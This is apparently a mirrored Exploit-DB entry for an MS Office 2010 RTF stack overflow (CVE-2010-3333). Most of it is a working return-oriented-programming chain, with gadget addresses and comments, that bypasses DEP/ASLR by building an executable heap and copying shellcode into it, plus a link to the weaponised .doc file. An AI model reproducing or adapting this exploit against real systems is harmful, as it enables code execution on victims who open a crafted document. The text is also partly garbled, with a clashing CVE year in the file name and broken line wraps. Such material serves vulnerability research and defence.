Microsoft Office 2010 – ‘.RTF’ Header Stack Overflow

• Exploit Database
• 8 阅读

• 作者： Snake
  日期： 2011-07-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17474/

• # Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
  Exploit
  # Date: 7/3/2011
  # Author: Snake ( Shahriyar.j < at > gmail )
  # Version: MS Office <= 2010
  # Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
  # CVE : CVE-2010-3333
  
  # This is the exploit I wrote for Abysssec "The Arashi" article.
  # It gracefully bypass DEP/ASLR in MS Office 2010,
  # and we named this method "Ikazuchi DEP/ASRL Bypass" : >
  # unfortunately msgr3en.dll loads a few seconds after opining office,
  # so just need to open open Office , and then open exploit after a few second and saw a nice calc.
  #
  # The Arashi : http://abysssec.com/files/The_Arashi.pdf
  # http://www.exploit-db.com/docs/17469.pdf
  #
  # me : twitter.com/ponez
  # aslo check here for Persian docs of this methods and more :
  # http://www.0days.ir/article/
  
  
  
  #
  # and the Rop :
  
  3F2CB9E0POP ECX
  RETN
  # HeapCreate() IAT = 3F10115C
  
  3F389CA5MOV EAX,DWORD PTR DS:[ECX]
  RETN
  # EAX == HeapCreate() Address
  
  3F39AFCFCALL EAX
  RETN
  # Call HeapCreate() and Create a Executable Heap :D
  # after this call, EAX contain our Heap Address.
  
  0x3F2CB9E0POP ECX
  RETN
  # pop 0x00008000 into ECX
  
  0x3F39CB46ADD EAX,ECX
  POP ESI
  RETN
  # add ECX to EAX and instead of calling HeapAlloc,
  # now EAX point to the RWX Heap :D
  
  0x3F2CB9E0 POP ECX
  RETN
  # pop 0x3F3B3DC0 into ECX, it is a writable address.
  
  0x3F2233CC MOV DWORD PTR DS:[ECX],EAX
  RETN
  # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
  further use ;)
  
  0x3F2D59DF POP EAX
  ADD DWORD PTR DS:[EAX],ESP
  RETN
  # pop 0x3F3B3DC4 into EAX , it is writable address with zero!
  # then we add ESP to the Zero which result in storing ESP into
  that address,
  # we need ESP address for copying shellcode ( which stores in
  Stack ),
  # and we have to get it dynamically at run-time, now with my
  tricky instruction, we have it!
  
  
  0x3F2F18CCPOP EAX
  RETN
  # pop 0x3F3B3DC4 ( ESP address ) into EAX
  
  
  0x3F2B745E MOV ECX,DWORD PTR DS:[EAX]
  RETN
  # now ECX point to nearly offset of Stack.
  
  0x3F39795EPOP EDX
  RETN
  # pop 0x00000024 into EDX
  
  0x3F39CB44ADD ECX,EDX
  ADD EAX,ECX
  POP ESI
  RETN
  # add 0x24 to ECX ( Stack address )
  
  0x3F398267 MOV EAX,ECX
  RETN
  # EAX = ECX ; )
  
  0x3F3A16DEMOV DWORD PTR DS:[ECX],EAX
  XOR EAX,EAX
  POP ESI
  RETN
  # mov EAX ( Stack Address + 24 = Current ESP value ) into the
  current Stack Location,
  # and the popping it into ESI ! now ESI point where shellcode
  stores in stack :D
  
  0x3F398267 MOV EAX,ECX
  RETN
  # EAX = ECX ; )
  
  3F2CB9E0POP ECX
  RETN
  # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
  
  0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
  RETN
  # now EAX point to our RWX Heap
  
  0x3F2B0A7C XCHG EAX,EDI
  RETN 4
  # EDI = Our RWX Heap Address
  
  
  3F2CB9E0POP ECX
  RETN
  # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
   
  
  0x3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
  RETN
  # now EAX point to our RWX Heap
  
  0x3F38BEFB ADD AL,58
  RETN
  # just skip some junks ; )
  
  3F2CB9E0POP ECX
  RETN
  # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )
  
  3F3441B4REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
  POP EDI
  POP ESI
  RETN
  # Copy shellcode from stack into RWX Heap
  
  
  3F39AFCF CALL EAX
  RETN
  # KABOOM !!!
  
  
  
  
  
  Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17474.doc (cve-2011-3333_exploit.doc)